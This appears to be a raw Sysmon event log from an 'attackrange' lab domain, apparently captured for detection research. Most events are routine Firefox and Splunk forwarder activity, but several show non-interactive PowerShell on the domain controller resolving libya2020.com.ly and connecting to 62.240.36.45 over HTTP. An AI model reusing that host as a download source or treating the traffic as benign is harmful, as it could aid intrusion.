Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=044EAAB62DE9BA1319357CF0257D0101,SHA256=4ECD86D428E4926D7B11BC3B398D821F25E641520A14959A104A8396C6488474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106418Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.188{58E9C193-B458-615A-1B02-00000000FC01}5292ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106417Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.241{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local58690-false142.250.185.170fra16s51-in-f10.1e100.net443https 354300x8000000000000000106416Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.886{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51838-false142.250.186.163fra24s08-in-f3.1e100.net80http 354300x8000000000000000106415Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.866{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51837-false142.250.185.170fra16s51-in-f10.1e100.net443https 354300x8000000000000000106414Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.862{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58689- 354300x8000000000000000106413Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:19.861{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61240- 23542300x8000000000000000106412Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.181{58E9C193-B458-615A-2102-00000000FC01}5760ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106411Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.113{58E9C193-B458-615A-1902-00000000FC01}5728ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082955Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:19.577{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50131-false10.0.1.12-8000- 23542300x800000000000000082954Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:21.086{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E55BED22F4703EA49F35F91072ABD42B,SHA256=F9ABACA0C07742B19EA4A7F4BB2F0516E5621EEBA0DBB0B3DCBD0CF1813A82E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082956Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:22.086{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF64AA4B5113C72D94DB60117644B6D,SHA256=36A32ABBF73DB9F62CAFC1A030625D010A8663A1552DC1E628969767B77A72BC,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000106427Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.147{58E9C193-B458-615A-2402-00000000FC01}5420libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000106426Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.117{58E9C193-B458-615A-1B02-00000000FC01}5292libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000106425Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.117{58E9C193-B458-615A-2102-00000000FC01}5760libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000106424Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.013{58E9C193-B458-615A-1902-00000000FC01}5728libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x8000000000000000106423Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.054{58E9C193-B458-615A-1902-00000000FC01}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51839-false62.240.36.45vweb10.lttnet.net80http 23542300x8000000000000000106422Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:22.120{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C938E49BEA0C28D7946A1633CD69FCD5,SHA256=A0F0F5AE2CCDBC9FA67F221D6826889E9F1EEC4D9F40892A94FB9513D482FDB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082957Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:23.086{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58AD1BCD4342747CC92D380010EA3481,SHA256=B90358C3E0B4A7C9756DAD7A69383F737150C318A599E5AA80B40EC260748E04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106468Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.715{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106467Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.210{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=B50CF628E0082A7840D84D0CBE1CAD48,SHA256=544DF79BCEF9DC8E082021E342C2A1B12CD0B8BDAF3687E0F23785406EDF33AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106466Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.210{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=F130C472E963FF3CEED251C65964B927,SHA256=E5D2A5BBE8AA43751EF7F7BC3A817A0963D56272A4C9B6055E60929606186CE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106465Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.210{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=5F93E0F827909390D257EBB27C77F392,SHA256=5BCB684F3EE3B2EC2F4945655FBEF281C487399D6BF90451647DB1761715D4C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106464Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.185{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51842-false62.240.36.45vweb10.lttnet.net80http 23542300x8000000000000000106463Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.210{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=9275B832091D9E3BFE50898A3BE022B5,SHA256=38C52A5435B625083000A054489B95E033F7B352377510DF668CEE749DE5803E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106462Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.156{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51841-false62.240.36.45vweb10.lttnet.net80http 354300x8000000000000000106461Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:21.155{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51840-false62.240.36.45vweb10.lttnet.net80http 23542300x8000000000000000106460Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.205{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=8AC8A05028631170937EDA4CF0E0A35A,SHA256=456AB2C0E4E117D62DC529362EB22C725D410098868442729ADE5E4FF0822E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106459Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.205{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=7BBA9B83F0F213C5A723209D4C9962CE,SHA256=E1B8E7DEB0F34EEB6BF4D10E47E734A1FE829C365DF360B98646D7E11F2DD4C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106458Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.205{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=16BF2AA546411BA25DC80EA288D47143,SHA256=524EC56C023155C7BE4C84D5AEC4FE2D85DFBAB3C2FA27F82BCD35028D546F83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106457Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.202{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=69EE5B232870704AFCC0E8957AA42A0F,SHA256=EC8DF5279022B68C0B542EC1688889374754106DFADBF7CAF8337E3F98865941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106456Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.202{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=83BCEF27E5B36115C2ADBA73CE9A7D2B,SHA256=3F68B0FEFBD484094D6517761B2DC13C6A430DDE3B44FA6CCACA3E39052D2AAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106455Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.195{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=177BC07ECED26CEBE0441C318BD35BB8,SHA256=2A816C802C006DF75CA86E1497E4CF05DFB0F07DB0CD31C0EC30EDAF92C2DF75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106454Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.195{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106453Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.195{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106452Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.190{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106451Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.175{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=FEC9BC354A7EE92C6FEEFE63E6B0FA26,SHA256=258EF8E6994A09FFB54BD0D5AFEC97C13C31F2EEFB7FE90A2A4C487C87817519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106450Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.170{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106449Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.170{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106448Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.170{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106447Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.170{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106446Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.170{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106445Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.170{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106444Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.165{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=07FF16BA9846838DA27AE094A1B91369,SHA256=DC83AE90504AC11C29876CFC48483976397E899958EE8EDE7F381971A2C2C4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106443Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.165{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=1B9A162CEB3C7BE8393CE348F35A4564,SHA256=2D6B6351BD1B8C2047DA1854D0033EE6C5CD9F1BFE38C5E1A2B82C86AFE8A598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106442Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.165{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106441Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.160{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106440Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.160{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106439Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.160{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106438Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.160{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=BF6C363FCFE18836F5B693AC897B03D0,SHA256=3436668289A12D65E3C22BC60B8E2EA8D2D6CF15DF1402FCB3C16DD875D438E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106437Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.155{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=D5F2E2EC2D972EA4E3BD5E52478574EC,SHA256=5A9F549160D35C4F4CCD6CC4EF4B63FF1A8859F8374AEA866A10F61DC2559E58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106436Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.155{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=82E921320B62879B070EBE9D8F1F4256,SHA256=A781BFF04964067CB06EA80DA605A4A2837F7256580693C6DBDCA971D8C9BDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106435Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.155{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=BB9BB51CB484CC5719D210D53CF37762,SHA256=1903A36C25AEB3C61953484ED931ED52AB4A3BD13FCC38046154A6681472D499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106434Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.155{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=C18D748EA4EC42607B01F62BD69CFCCA,SHA256=C3D2FA87A01F8DBA161F97959CC08E146AED0F15A3CCBD94B7019A4DBF2A14EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106433Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.155{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=1FC7B2422CDE492733C09B15532720CD,SHA256=B3924A454B89471C1B26B69C90B4E1FC468B75BE378E7A1646CB1DF30AE59BDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106432Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106431Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla 